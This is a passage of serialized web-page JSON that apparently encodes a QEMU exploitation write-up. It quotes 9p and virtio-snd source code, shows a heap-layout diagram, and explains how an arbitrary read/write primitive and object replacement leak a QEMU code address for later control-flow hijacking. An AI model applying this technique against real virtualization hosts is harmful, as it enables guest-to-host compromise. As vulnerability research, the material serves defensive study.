",{"type":25,"tag":216,"props":134085,"children":134086},{"style":6953},[134087],{"type":31,"value":266},{"type":25,"tag":216,"props":134089,"children":134090},{"style":6953},[134091],{"type":31,"value":55224},{"type":25,"tag":216,"props":134093,"children":134094},{"style":6964},[134095],{"type":31,"value":134096},"EINVAL;\n",{"type":25,"tag":216,"props":134098,"children":134099},{"class":6922,"line":7591},[134100,134104],{"type":25,"tag":216,"props":134101,"children":134102},{"style":6973},[134103],{"type":31,"value":64517},{"type":25,"tag":216,"props":134105,"children":134106},{"style":6964},[134107],{"type":31,"value":64522},{"type":25,"tag":216,"props":134109,"children":134110},{"class":6922,"line":7604},[134111],{"type":25,"tag":216,"props":134112,"children":134113},{"style":6964},[134114],{"type":31,"value":7302},{"type":25,"tag":216,"props":134116,"children":134117},{"class":6922,"line":7613},[134118,134123,134127,134132,134136,134141,134145,134149],{"type":25,"tag":216,"props":134119,"children":134120},{"style":6947},[134121],{"type":31,"value":134122},"        newfidp",{"type":25,"tag":216,"props":134124,"children":134125},{"style":6964},[134126],{"type":31,"value":17714},{"type":25,"tag":216,"props":134128,"children":134129},{"style":6947},[134130],{"type":31,"value":134131},"uid",{"type":25,"tag":216,"props":134133,"children":134134},{"style":6953},[134135],{"type":31,"value":6956},{"type":25,"tag":216,"props":134137,"children":134138},{"style":6947},[134139],{"type":31,"value":134140}," fidp",{"type":25,"tag":216,"props":134142,"children":134143},{"style":6964},[134144],{"type":31,"value":17714},{"type":25,"tag":216,"props":134146,"children":134147},{"style":6947},[134148],{"type":31,"value":134131},{"type":25,"tag":216,"props":134150,"children":134151},{"style":6964},[134152],{"type":31,"value":6967},{"type":25,"tag":216,"props":134154,"children":134155},{"class":6922,"line":7636},[134156,134161,134165,134169,134174,134178,134182,134186,134190],{"type":25,"tag":216,"props":134157,"children":134158},{"style":7047},[134159],{"type":31,"value":134160},"        v9fs_path_copy",{"type":25,"tag":216,"props":134162,"children":134163},{"style":6964},[134164],{"type":31,"value":1850},{"type":25,"tag":216,"props":134166,"children":134167},{"style":6953},[134168],{"type":31,"value":7059},{"type":25,"tag":216,"props":134170,"children":134171},{"style":6947},[134172],{"type":31,"value":134173},"newfidp",{"type":25,"tag":216,"props":134175,"children":134176},{"style":6964},[134177],{"type":31,"value":17714},{"type":25,"tag":216,"props":134179,"children":134180},{"style":6947},[134181],{"type":31,"value":116268},{"type":25,"tag":216,"props":134183,"children":134184},{"style":6964},[134185],{"type":31,"value":7026},{"type":25,"tag":216,"props":134187,"children":134188},{"style":6953},[134189],{"type":31,"value":7059},{"type":25,"tag":216,"props":134191,"children":134192},{"style":6964},[134193],{"type":31,"value":134194},"path);\n",{"type":25,"tag":216,"props":134196,"children":134197},{"class":6922,"line":7645},[134198],{"type":25,"tag":216,"props":134199,"children":134200},{"style":6964},[134201],{"type":31,"value":7311},{"type":25,"tag":216,"props":134203,"children":134204},{"class":6922,"line":7654},[134205],{"type":25,"tag":216,"props":134206,"children":134207},{"emptyLinePlaceholder":16},[134208],{"type":31,"value":7642},{"type":25,"tag":216,"props":134210,"children":134211},{"class":6922,"line":7722},[134212],{"type":25,"tag":216,"props":134213,"children":134214},{"style":6964},[134215],{"type":31,"value":108759},{"type":25,"tag":216,"props":134217,"children":134218},{"class":6922,"line":7730},[134219],{"type":25,"tag":216,"props":134220,"children":134221},{"style":6964},[134222],{"type":31,"value":7874},{"type":25,"tag":216,"props":134224,"children":134225},{"class":6922,"line":7760},[134226],{"type":25,"tag":216,"props":134227,"children":134228},{"emptyLinePlaceholder":16},[134229],{"type":31,"value":7642},{"type":25,"tag":216,"props":134231,"children":134232},{"class":6922,"line":7768},[134233,134237,134242,134246,134250,134255,134259,134263,134267,134272,134277],{"type":25,"tag":216,"props":134234,"children":134235},{"style":6936},[134236],{"type":31,"value":55013},{"type":25,"tag":216,"props":134238,"children":134239},{"style":6964},[134240],{"type":31,"value":134241}," V9fsFidState ",{"type":25,"tag":216,"props":134243,"children":134244},{"style":6953},[134245],{"type":31,"value":8519},{"type":25,"tag":216,"props":134247,"children":134248},{"style":7047},[134249],{"type":31,"value":133859},{"type":25,"tag":216,"props":134251,"children":134252},{"style":6964},[134253],{"type":31,"value":134254},"(V9fsState ",{"type":25,"tag":216,"props":134256,"children":134257},{"style":6953},[134258],{"type":31,"value":8519},{"type":25,"tag":216,"props":134260,"children":134261},{"style":6947},[134262],{"type":31,"value":3245},{"type":25,"tag":216,"props":134264,"children":134265},{"style":6964},[134266],{"type":31,"value":7026},{"type":25,"tag":216,"props":134268,"children":134269},{"style":6936},[134270],{"type":31,"value":134271},"int32_t",{"type":25,"tag":216,"props":134273,"children":134274},{"style":6947},[134275],{"type":31,"value":134276}," fid",{"type":25,"tag":216,"props":134278,"children":134279},{"style":6964},[134280],{"type":31,"value":7107},{"type":25,"tag":216,"props":134282,"children":134283},{"class":6922,"line":7800},[134284],{"type":25,"tag":216,"props":134285,"children":134286},{"style":6964},[134287],{"type":31,"value":14836},{"type":25,"tag":216,"props":134289,"children":134290},{"class":6922,"line":7808},[134291,134295,134299],{"type":25,"tag":216,"props":134292,"children":134293},{"style":6964},[134294],{"type":31,"value":132023},{"type":25,"tag":216,"props":134296,"children":134297},{"style":6953},[134298],{"type":31,"value":8519},{"type":25,"tag":216,"props":134300,"children":134301},{"style":6964},[134302],{"type":31,"value":55134},{"type":25,"tag":216,"props":134304,"children":134305},{"class":6922,"line":7868},[134306],{"type":25,"tag":216,"props":134307,"children":134308},{"emptyLinePlaceholder":16},[134309],{"type":31,"value":7642},{"type":25,"tag":216,"props":134311,"children":134312},{"class":6922,"line":13001},[134313,134318,134322,134327,134331,134335,134339,134344,134348,134353],{"type":25,"tag":216,"props":134314,"children":134315},{"style":6964},[134316],{"type":31,"value":134317},"    f ",{"type":25,"tag":216,"props":134319,"children":134320},{"style":6953},[134321],{"type":31,"value":266},{"type":25,"tag":216,"props":134323,"children":134324},{"style":7047},[134325],{"type":31,"value":134326}," g_hash_table_lookup",{"type":25,"tag":216,"props":134328,"children":134329},{"style":6964},[134330],{"type":31,"value":1850},{"type":25,"tag":216,"props":134332,"children":134333},{"style":6947},[134334],{"type":31,"value":3245},{"type":25,"tag":216,"props":134336,"children":134337},{"style":6964},[134338],{"type":31,"value":17714},{"type":25,"tag":216,"props":134340,"children":134341},{"style":6947},[134342],{"type":31,"value":134343},"fids",{"type":25,"tag":216,"props":134345,"children":134346},{"style":6964},[134347],{"type":31,"value":7026},{"type":25,"tag":216,"props":134349,"children":134350},{"style":7047},[134351],{"type":31,"value":134352},"GINT_TO_POINTER",{"type":25,"tag":216,"props":134354,"children":134355},{"style":6964},[134356],{"type":31,"value":134357},"(fid));\n",{"type":25,"tag":216,"props":134359,"children":134360},{"class":6922,"line":13019},[134361,134365],{"type":25,"tag":216,"props":134362,"children":134363},{"style":6973},[134364],{"type":31,"value":16235},{"type":25,"tag":216,"props":134366,"children":134367},{"style":6964},[134368],{"type":31,"value":134369}," (f) {\n",{"type":25,"tag":216,"props":134371,"children":134372},{"class":6922,"line":13064},[134373],{"type":25,"tag":216,"props":134374,"children":134375},{"style":6927},[134376],{"type":31,"value":134377},"        /* If fid is already there return NULL */\n",{"type":25,"tag":216,"props":134379,"children":134380},{"class":6922,"line":13170},[134381,134386,134390,134394,134398,134403],{"type":25,"tag":216,"props":134382,"children":134383},{"style":7047},[134384],{"type":31,"value":134385},"        BUG_ON",{"type":25,"tag":216,"props":134387,"children":134388},{"style":6964},[134389],{"type":31,"value":1850},{"type":25,"tag":216,"props":134391,"children":134392},{"style":6947},[134393],{"type":31,"value":37047},{"type":25,"tag":216,"props":134395,"children":134396},{"style":6964},[134397],{"type":31,"value":17714},{"type":25,"tag":216,"props":134399,"children":134400},{"style":6947},[134401],{"type":31,"value":134402},"clunked",{"type":25,"tag":216,"props":134404,"children":134405},{"style":6964},[134406],{"type":31,"value":7797},{"type":25,"tag":216,"props":134408,"children":134409},{"class":6922,"line":27455},[134410,134414,134418],{"type":25,"tag":216,"props":134411,"children":134412},{"style":6973},[134413],{"type":31,"value":19702},{"type":25,"tag":216,"props":134415,"children":134416},{"style":6936},[134417],{"type":31,"value":131702},{"type":25,"tag":216,"props":134419,"children":134420},{"style":6964},[134421],{"type":31,"value":6967},{"type":25,"tag":216,"props":134423,"children":134424},{"class":6922,"line":27490},[134425],{"type":25,"tag":216,"props":134426,"children":134427},{"style":6964},[134428],{"type":31,"value":7311},{"type":25,"tag":216,"props":134430,"children":134431},{"class":6922,"line":27498},[134432,134436,134440,134445,134450,134454],{"type":25,"tag":216,"props":134433,"children":134434},{"style":6964},[134435],{"type":31,"value":134317},{"type":25,"tag":216,"props":134437,"children":134438},{"style":6953},[134439],{"type":31,"value":266},{"type":25,"tag":216,"props":134441,"children":134442},{"style":7047},[134443],{"type":31,"value":134444}," g_new0",{"type":25,"tag":216,"props":134446,"children":134447},{"style":6964},[134448],{"type":31,"value":134449},"(V9fsFidState, ",{"type":25,"tag":216,"props":134451,"children":134452},{"style":6989},[134453],{"type":31,"value":184},{"type":25,"tag":216,"props":134455,"children":134456},{"style":6964},[134457],{"type":31,"value":7797},{"type":25,"tag":216,"props":134459,"children":134460},{"class":6922,"line":27506},[134461],{"type":25,"tag":216,"props":134462,"children":134463},{"emptyLinePlaceholder":16},[134464],{"type":31,"value":7642},{"type":25,"tag":216,"props":134466,"children":134467},{"class":6922,"line":27515},[134468],{"type":25,"tag":216,"props":134469,"children":134470},{"style":6964},[134471],{"type":31,"value":108759},{"type":25,"tag":38,"props":134473,"children":134474},{},[134475,134477,134482],{"type":31,"value":134476},"After it is allocated, it will be placed into that freed region in place of the old ",{"type":25,"tag":82,"props":134478,"children":134480},{"className":134479},[],[134481],{"type":31,"value":133277},{"type":31,"value":132614},{"type":25,"tag":206,"props":134484,"children":134486},{"code":134485},"             .value Y extended\n                     |\n+--------------------+--------------------+\n|                                         |\n|                                         |\nv                                         v\n+--------------------+---------------+----+\n|                    |               |....|\n|      .value Y      |  V9fsFidState |....|\n|                    |               |....|\n+--------------------+---------------+----+\n",[134487],{"type":25,"tag":82,"props":134488,"children":134489},{"__ignoreMap":7},[134490],{"type":31,"value":134485},{"type":25,"tag":630,"props":134492,"children":134494},{"id":134493},"leaking-a-qemu-address",[134495],{"type":31,"value":134496},"Leaking a QEMU Address",{"type":25,"tag":38,"props":134498,"children":134499},{},[134500],{"type":31,"value":134501},"We now have an arbitrary read/write primitive and a controlled chunk at a known address. The next step is to leak a QEMU code address so we can later redirect execution. To do this, we combine the arbitrary read primitive with the known-address chunk: we free that chunk, replace it with an object that contains pointers into QEMU's code or data, and then use arbitrary read to leak its fields.",{"type":25,"tag":38,"props":134503,"children":134504},{},[134505,134507,134512],{"type":31,"value":134506},"For this, we go back to virtio-snd and its buffer allocations. Recall ",{"type":25,"tag":82,"props":134508,"children":134510},{"className":134509},[],[134511],{"type":31,"value":127697},{"type":31,"value":1472},{"type":25,"tag":206,"props":134514,"children":134516},{"code":134515,"language":2254,"meta":7,"className":20473,"style":7},"static void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n    VirtIOSound *vsnd = VIRTIO_SND(vdev);\n    VirtIOSoundPCMBuffer *buffer;\n    VirtQueueElement *elem;\n    size_t msg_sz, size;\n    uint32_t stream_id;\n\n    [...]\n\n    for (;;) {\n        VirtIOSoundPCMStream *stream;\n\n        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));\n        if (!elem) {\n            break;\n        }\n        /* get the message hdr object */\n        msg_sz = iov_to_buf(elem->out_sg,\n                            elem->out_num,\n                            0,\n                            &hdr,\n                            sizeof(virtio_snd_pcm_xfer));\n        if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {\n            goto rx_err;\n        }\n        stream_id = le32_to_cpu(hdr.stream_id);\n\n        [...]\n\n        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n            size = iov_size(elem->in_sg, elem->in_num) -\n                sizeof(virtio_snd_pcm_status);\n            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);    // [1]\n            buffer->elem = elem;\n            buffer->vq = vq;                                            // [2]\n            buffer->size = 0;\n            buffer->offset = 0;\n            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);\n        }\n",[134517],{"type":25,"tag":82,"props":134518,"children":134519},{"__ignoreMap":7},[134520,134563,134570,134601,134616,134631,134643,134656,134663,134670,134677,134688,134703,134710,134738,134757,134768,134775,134783,134820,134841,134853,134866,134879,134905,134917,134924,134962,134969,134976,134983,135014,135069,135081,135122,135145,135174,135201,135228,135260],{"type":25,"tag":216,"props":134521,"children":134522},{"class":6922,"line":6923},[134523,134527,134531,134535,134539,134543,134547,134551,134555,134559],{"type":25,"tag":216,"props":134524,"children":134525},{"style":6936},[134526],{"type":31,"value":55013},{"type":25,"tag":216,"props":134528,"children":134529},{"style":6936},[134530],{"type":31,"value":55018},{"type":25,"tag":216,"props":134532,"children":134533},{"style":7047},[134534],{"type":31,"value":127776},{"type":25,"tag":216,"props":134536,"children":134537},{"style":6964},[134538],{"type":31,"value":127781},{"type":25,"tag":216,"props":134540,"children":134541},{"style":6953},[134542],{"type":31,"value":8519},{"type":25,"tag":216,"props":134544,"children":134545},{"style":6947},[134546],{"type":31,"value":127790},{"type":25,"tag":216,"props":134548,"children":134549},{"style":6964},[134550],{"type":31,"value":127795},{"type":25,"tag":216,"props":134552,"children":134553},{"style":6953},[134554],{"type":31,"value":8519},{"type":25,"tag":216,"props":134556,"children":134557},{"style":6947},[134558],{"type":31,"value":127804},{"type":25,"tag":216,"props":134560,"children":134561},{"style":6964},[134562],{"type":31,"value":7107},{"type":25,"tag":216,"props":134564,"children":134565},{"class":6922,"line":6769},[134566],{"type":25,"tag":216,"props":134567,"children":134568},{"style":6964},[134569],{"type":31,"value":14836},{"type":25,"tag":216,"props":134571,"children":134572},{"class":6922,"line":6778},[134573,134578,134582,134587,134591,134596],{"type":25,"tag":216,"props":134574,"children":134575},{"style":6964},[134576],{"type":31,"value":134577},"    VirtIOSound ",{"type":25,"tag":216,"props":134579,"children":134580},{"style":6953},[134581],{"type":31,"value":8519},{"type":25,"tag":216,"props":134583,"children":134584},{"style":6964},[134585],{"type":31,"value":134586},"vsnd ",{"type":25,"tag":216,"props":134588,"children":134589},{"style":6953},[134590],{"type":31,"value":266},{"type":25,"tag":216,"props":134592,"children":134593},{"style":7047},[134594],{"type":31,"value":134595}," VIRTIO_SND",{"type":25,"tag":216,"props":134597,"children":134598},{"style":6964},[134599],{"type":31,"value":134600},"(vdev);\n",{"type":25,"tag":216,"props":134602,"children":134603},{"class":6922,"line":7005},[134604,134608,134612],{"type":25,"tag":216,"props":134605,"children":134606},{"style":6964},[134607],{"type":31,"value":128794},{"type":25,"tag":216,"props":134609,"children":134610},{"style":6953},[134611],{"type":31,"value":8519},{"type":25,"tag":216,"props":134613,"children":134614},{"style":6964},[134615],{"type":31,"value":128803},{"type":25,"tag":216,"props":134617,"children":134618},{"class":6922,"line":7110},[134619,134623,134627],{"type":25,"tag":216,"props":134620,"children":134621},{"style":6964},[134622],{"type":31,"value":127823},{"type":25,"tag":216,"props":134624,"children":134625},{"style":6953},[134626],{"type":31,"value":8519},{"type":25,"tag":216,"props":134628,"children":134629},{"style":6964},[134630],{"type":31,"value":127832},{"type":25,"tag":216,"props":134632,"children":134633},{"class":6922,"line":7216},[134634,134638],{"type":25,"tag":216,"props":134635,"children":134636},{"style":6936},[134637],{"type":31,"value":20523},{"type":25,"tag":216,"props":134639,"children":134640},{"style":6964},[134641],{"type":31,"value":134642}," msg_sz, size;\n",{"type":25,"tag":216,"props":134644,"children":134645},{"class":6922,"line":7244},[134646,134651],{"type":25,"tag":216,"props":134647,"children":134648},{"style":6936},[134649],{"type":31,"value":134650},"    uint32_t",{"type":25,"tag":216,"props":134652,"children":134653},{"style":6964},[134654],{"type":31,"value":134655}," stream_id;\n",{"type":25,"tag":216,"props":134657,"children":134658},{"class":6922,"line":7257},[134659],{"type":25,"tag":216,"props":134660,"children":134661},{"emptyLinePlaceholder":16},[134662],{"type":31,"value":7642},{"type":25,"tag":216,"props":134664,"children":134665},{"class":6922,"line":7275},[134666],{"type":25,"tag":216,"props":134667,"children":134668},{"style":6964},[134669],{"type":31,"value":108759},{"type":25,"tag":216,"props":134671,"children":134672},{"class":6922,"line":7296},[134673],{"type":25,"tag":216,"props":134674,"children":134675},{"emptyLinePlaceholder":16},[134676],{"type":31,"value":7642},{"type":25,"tag":216,"props":134678,"children":134679},{"class":6922,"line":7305},[134680,134684],{"type":25,"tag":216,"props":134681,"children":134682},{"style":6973},[134683],{"type":31,"value":6976},{"type":25,"tag":216,"props":134685,"children":134686},{"style":6964},[134687],{"type":31,"value":127858},{"type":25,"tag":216,"props":134689,"children":134690},{"class":6922,"line":7557},[134691,134695,134699],{"type":25,"tag":216,"props":134692,"children":134693},{"style":6964},[134694],{"type":31,"value":127866},{"type":25,"tag":216,"props":134696,"children":134697},{"style":6953},[134698],{"type":31,"value":8519},{"type":25,"tag":216,"props":134700,"children":134701},{"style":6964},[134702],{"type":31,"value":127875},{"type":25,"tag":216,"props":134704,"children":134705},{"class":6922,"line":7574},[134706],{"type":25,"tag":216,"props":134707,"children":134708},{"emptyLinePlaceholder":16},[134709],{"type":31,"value":7642},{"type":25,"tag":216,"props":134711,"children":134712},{"class":6922,"line":7591},[134713,134717,134721,134725,134729,134733],{"type":25,"tag":216,"props":134714,"children":134715},{"style":6964},[134716],{"type":31,"value":127890},{"type":25,"tag":216,"props":134718,"children":134719},{"style":6953},[134720],{"type":31,"value":266},{"type":25,"tag":216,"props":134722,"children":134723},{"style":7047},[134724],{"type":31,"value":127899},{"type":25,"tag":216,"props":134726,"children":134727},{"style":6964},[134728],{"type":31,"value":127904},{"type":25,"tag":216,"props":134730,"children":134731},{"style":6936},[134732],{"type":31,"value":59296},{"type":25,"tag":216,"props":134734,"children":134735},{"style":6964},[134736],{"type":31,"value":134737},"(VirtQueueElement));\n",{"type":25,"tag":216,"props":134739,"children":134740},{"class":6922,"line":7604},[134741,134745,134749,134753],{"type":25,"tag":216,"props":134742,"children":134743},{"style":6973},[134744],{"type":31,"value":7222},{"type":25,"tag":216,"props":134746,"children":134747},{"style":6964},[134748],{"type":31,"value":7016},{"type":25,"tag":216,"props":134750,"children":134751},{"style":6953},[134752],{"type":31,"value":24581},{"type":25,"tag":216,"props":134754,"children":134755},{"style":6964},[134756],{"type":31,"value":127938},{"type":25,"tag":216,"props":134758,"children":134759},{"class":6922,"line":7613},[134760,134764],{"type":25,"tag":216,"props":134761,"children":134762},{"style":6973},[134763],{"type":31,"value":7250},{"type":25,"tag":216,"props":134765,"children":134766},{"style":6964},[134767],{"type":31,"value":6967},{"type":25,"tag":216,"props":134769,"children":134770},{"class":6922,"line":7636},[134771],{"type":25,"tag":216,"props":134772,"children":134773},{"style":6964},[134774],{"type":31,"value":7302},{"type":25,"tag":216,"props":134776,"children":134777},{"class":6922,"line":7645},[134778],{"type":25,"tag":216,"props":134779,"children":134780},{"style":6927},[134781],{"type":31,"value":134782},"        /* get the message hdr object */\n",{"type":25,"tag":216,"props":134784,"children":134785},{"class":6922,"line":7654},[134786,134791,134795,134800,134804,134808,134812,134816],{"type":25,"tag":216,"props":134787,"children":134788},{"style":6964},[134789],{"type":31,"value":134790},"        msg_sz ",{"type":25,"tag":216,"props":134792,"children":134793},{"style":6953},[134794],{"type":31,"value":266},{"type":25,"tag":216,"props":134796,"children":134797},{"style":7047},[134798],{"type":31,"value":134799}," iov_to_buf",{"type":25,"tag":216,"props":134801,"children":134802},{"style":6964},[134803],{"type":31,"value":1850},{"type":25,"tag":216,"props":134805,"children":134806},{"style":6947},[134807],{"type":31,"value":56032},{"type":25,"tag":216,"props":134809,"children":134810},{"style":6964},[134811],{"type":31,"value":17714},{"type":25,"tag":216,"props":134813,"children":134814},{"style":6947},[134815],{"type":31,"value":128342},{"type":25,"tag":216,"props":134817,"children":134818},{"style":6964},[134819],{"type":31,"value":7465},{"type":25,"tag":216,"props":134821,"children":134822},{"class":6922,"line":7722},[134823,134828,134832,134837],{"type":25,"tag":216,"props":134824,"children":134825},{"style":6947},[134826],{"type":31,"value":134827},"                            elem",{"type":25,"tag":216,"props":134829,"children":134830},{"style":6964},[134831],{"type":31,"value":17714},{"type":25,"tag":216,"props":134833,"children":134834},{"style":6947},[134835],{"type":31,"value":134836},"out_num",{"type":25,"tag":216,"props":134838,"children":134839},{"style":6964},[134840],{"type":31,"value":7465},{"type":25,"tag":216,"props":134842,"children":134843},{"class":6922,"line":7730},[134844,134849],{"type":25,"tag":216,"props":134845,"children":134846},{"style":6989},[134847],{"type":31,"value":134848},"                            0",{"type":25,"tag":216,"props":134850,"children":134851},{"style":6964},[134852],{"type":31,"value":7465},{"type":25,"tag":216,"props":134854,"children":134855},{"class":6922,"line":7760},[134856,134861],{"type":25,"tag":216,"props":134857,"children":134858},{"style":6953},[134859],{"type":31,"value":134860},"                            &",{"type":25,"tag":216,"props":134862,"children":134863},{"style":6964},[134864],{"type":31,"value":134865},"hdr,\n",{"type":25,"tag":216,"props":134867,"children":134868},{"class":6922,"line":7768},[134869,134874],{"type":25,"tag":216,"props":134870,"children":134871},{"style":6936},[134872],{"type":31,"value":134873},"                            sizeof",{"type":25,"tag":216,"props":134875,"children":134876},{"style":6964},[134877],{"type":31,"value":134878},"(virtio_snd_pcm_xfer));\n",{"type":25,"tag":216,"props":134880,"children":134881},{"class":6922,"line":7800},[134882,134886,134891,134895,134900],{"type":25,"tag":216,"props":134883,"children":134884},{"style":6973},[134885],{"type":31,"value":7222},{"type":25,"tag":216,"props":134887,"children":134888},{"style":6964},[134889],{"type":31,"value":134890}," (msg_sz ",{"type":25,"tag":216,"props":134892,"children":134893},{"style":6953},[134894],{"type":31,"value":19646},{"type":25,"tag":216,"props":134896,"children":134897},{"style":6936},[134898],{"type":31,"value":134899}," sizeof",{"type":25,"tag":216,"props":134901,"children":134902},{"style":6964},[134903],{"type":31,"value":134904},"(virtio_snd_pcm_xfer)) {\n",{"type":25,"tag":216,"props":134906,"children":134907},{"class":6922,"line":7808},[134908,134912],{"type":25,"tag":216,"props":134909,"children":134910},{"style":6973},[134911],{"type":31,"value":64517},{"type":25,"tag":216,"props":134913,"children":134914},{"style":6964},[134915],{"type":31,"value":134916}," rx_err;\n",{"type":25,"tag":216,"props":134918,"children":134919},{"class":6922,"line":7868},[134920],{"type":25,"tag":216,"props":134921,"children":134922},{"style":6964},[134923],{"type":31,"value":7302},{"type":25,"tag":216,"props":134925,"children":134926},{"class":6922,"line":13001},[134927,134932,134936,134940,134944,134949,134953,134958],{"type":25,"tag":216,"props":134928,"children":134929},{"style":6964},[134930],{"type":31,"value":134931},"        stream_id ",{"type":25,"tag":216,"props":134933,"children":134934},{"style":6953},[134935],{"type":31,"value":266},{"type":25,"tag":216,"props":134937,"children":134938},{"style":7047},[134939],{"type":31,"value":129804},{"type":25,"tag":216,"props":134941,"children":134942},{"style":6964},[134943],{"type":31,"value":1850},{"type":25,"tag":216,"props":134945,"children":134946},{"style":6947},[134947],{"type":31,"value":134948},"hdr",{"type":25,"tag":216,"props":134950,"children":134951},{"style":6964},[134952],{"type":31,"value":179},{"type":25,"tag":216,"props":134954,"children":134955},{"style":6947},[134956],{"type":31,"value":134957},"stream_id",{"type":25,"tag":216,"props":134959,"children":134960},{"style":6964},[134961],{"type":31,"value":7797},{"type":25,"tag":216,"props":134963,"children":134964},{"class":6922,"line":13019},[134965],{"type":25,"tag":216,"props":134966,"children":134967},{"emptyLinePlaceholder":16},[134968],{"type":31,"value":7642},{"type":25,"tag":216,"props":134970,"children":134971},{"class":6922,"line":13064},[134972],{"type":25,"tag":216,"props":134973,"children":134974},{"style":6964},[134975],{"type":31,"value":127971},{"type":25,"tag":216,"props":134977,"children":134978},{"class":6922,"line":13170},[134979],{"type":25,"tag":216,"props":134980,"children":134981},{"emptyLinePlaceholder":16},[134982],{"type":31,"value":7642},{"type":25,"tag":216,"props":134984,"children":134985},{"class":6922,"line":27455},[134986,134990,134994,134998,135002,135006,135010],{"type":25,"tag":216,"props":134987,"children":134988},{"style":7047},[134989],{"type":31,"value":127986},{"type":25,"tag":216,"props":134991,"children":134992},{"style":6964},[134993],{"type":31,"value":1850},{"type":25,"tag":216,"props":134995,"children":134996},{"style":6953},[134997],{"type":31,"value":7059},{"type":25,"tag":216,"props":134999,"children":135000},{"style":6947},[135001],{"type":31,"value":40224},{"type":25,"tag":216,"props":135003,"children":135004},{"style":6964},[135005],{"type":31,"value":17714},{"type":25,"tag":216,"props":135007,"children":135008},{"style":6947},[135009],{"type":31,"value":128007},{"type":25,"tag":216,"props":135011,"children":135012},{"style":6964},[135013],{"type":31,"value":18761},{"type":25,"tag":216,"props":135015,"children":135016},{"class":6922,"line":27490},[135017,135021,135025,135029,135033,135037,135041,135045,135049,135053,135057,135061,135065],{"type":25,"tag":216,"props":135018,"children":135019},{"style":6964},[135020],{"type":31,"value":128019},{"type":25,"tag":216,"props":135022,"children":135023},{"style":6953},[135024],{"type":31,"value":266},{"type":25,"tag":216,"props":135026,"children":135027},{"style":7047},[135028],{"type":31,"value":128028},{"type":25,"tag":216,"props":135030,"children":135031},{"style":6964},[135032],{"type":31,"value":1850},{"type":25,"tag":216,"props":135034,"children":135035},{"style":6947},[135036],{"type":31,"value":56032},{"type":25,"tag":216,"props":135038,"children":135039},{"style":6964},[135040],{"type":31,"value":17714},{"type":25,"tag":216,"props":135042,"children":135043},{"style":6947},[135044],{"type":31,"value":128045},{"type":25,"tag":216,"props":135046,"children":135047},{"style":6964},[135048],{"type":31,"value":7026},{"type":25,"tag":216,"props":135050,"children":135051},{"style":6947},[135052],{"type":31,"value":56032},{"type":25,"tag":216,"props":135054,"children":135055},{"style":6964},[135056],{"type":31,"value":17714},{"type":25,"tag":216,"props":135058,"children":135059},{"style":6947},[135060],{"type":31,"value":128062},{"type":25,"tag":216,"props":135062,"children":135063},{"style":6964},[135064],{"type":31,"value":7036},{"type":25,"tag":216,"props":135066,"children":135067},{"style":6953},[135068],{"type":31,"value":54830},{"type":25,"tag":216,"props":135070,"children":135071},{"class":6922,"line":27498},[135072,135076],{"type":25,"tag":216,"props":135073,"children":135074},{"style":6936},[135075],{"type":31,"value":128078},{"type":25,"tag":216,"props":135077,"children":135078},{"style":6964},[135079],{"type":31,"value":135080},"(virtio_snd_pcm_status);\n",{"type":25,"tag":216,"props":135082,"children":135083},{"class":6922,"line":27506},[135084,135088,135092,135096,135100,135104,135108,135112,135117],{"type":25,"tag":216,"props":135085,"children":135086},{"style":6964},[135087],{"type":31,"value":128096},{"type":25,"tag":216,"props":135089,"children":135090},{"style":6953},[135091],{"type":31,"value":266},{"type":25,"tag":216,"props":135093,"children":135094},{"style":7047},[135095],{"type":31,"value":128105},{"type":25,"tag":216,"props":135097,"children":135098},{"style":6964},[135099],{"type":31,"value":1850},{"type":25,"tag":216,"props":135101,"children":135102},{"style":6936},[135103],{"type":31,"value":59296},{"type":25,"tag":216,"props":135105,"children":135106},{"style":6964},[135107],{"type":31,"value":128118},{"type":25,"tag":216,"props":135109,"children":135110},{"style":6953},[135111],{"type":31,"value":3539},{"type":25,"tag":216,"props":135113,"children":135114},{"style":6964},[135115],{"type":31,"value":135116}," size);",{"type":25,"tag":216,"props":135118,"children":135119},{"style":6927},[135120],{"type":31,"value":135121},"    // [1]\n",{"type":25,"tag":216,"props":135123,"children":135124},{"class":6922,"line":27515},[135125,135129,135133,135137,135141],{"type":25,"tag":216,"props":135126,"children":135127},{"style":6947},[135128],{"type":31,"value":128135},{"type":25,"tag":216,"props":135130,"children":135131},{"style":6964},[135132],{"type":31,"value":17714},{"type":25,"tag":216,"props":135134,"children":135135},{"style":6947},[135136],{"type":31,"value":56032},{"type":25,"tag":216,"props":135138,"children":135139},{"style":6953},[135140],{"type":31,"value":6956},{"type":25,"tag":216,"props":135142,"children":135143},{"style":6964},[135144],{"type":31,"value":128152},{"type":25,"tag":216,"props":135146,"children":135147},{"class":6922,"line":27557},[135148,135152,135156,135160,135164,135169],{"type":25,"tag":216,"props":135149,"children":135150},{"style":6947},[135151],{"type":31,"value":128135},{"type":25,"tag":216,"props":135153,"children":135154},{"style":6964},[135155],{"type":31,"value":17714},{"type":25,"tag":216,"props":135157,"children":135158},{"style":6947},[135159],{"type":31,"value":127804},{"type":25,"tag":216,"props":135161,"children":135162},{"style":6953},[135163],{"type":31,"value":6956},{"type":25,"tag":216,"props":135165,"children":135166},{"style":6964},[135167],{"type":31,"value":135168}," vq;",{"type":25,"tag":216,"props":135170,"children":135171},{"style":6927},[135172],{"type":31,"value":135173},"                                            // [2]\n",{"type":25,"tag":216,"props":135175,"children":135176},{"class":6922,"line":27590},[135177,135181,135185,135189,135193,135197],{"type":25,"tag":216,"props":135178,"children":135179},{"style":6947},[135180],{"type":31,"value":128135},{"type":25,"tag":216,"props":135182,"children":135183},{"style":6964},[135184],{"type":31,"value":17714},{"type":25,"tag":216,"props":135186,"children":135187},{"style":6947},[135188],{"type":31,"value":128192},{"type":25,"tag":216,"props":135190,"children":135191},{"style":6953},[135192],{"type":31,"value":6956},{"type":25,"tag":216,"props":135194,"children":135195},{"style":6989},[135196],{"type":31,"value":6992},{"type":25,"tag":216,"props":135198,"children":135199},{"style":6964},[135200],{"type":31,"value":6967},{"type":25,"tag":216,"props":135202,"children":135203},{"class":6922,"line":27598},[135204,135208,135212,135216,135220,135224],{"type":25,"tag":216,"props":135205,"children":135206},{"style":6947},[135207],{"type":31,"value":128135},{"type":25,"tag":216,"props":135209,"children":135210},{"style":6964},[135211],{"type":31,"value":17714},{"type":25,"tag":216,"props":135213,"children":1352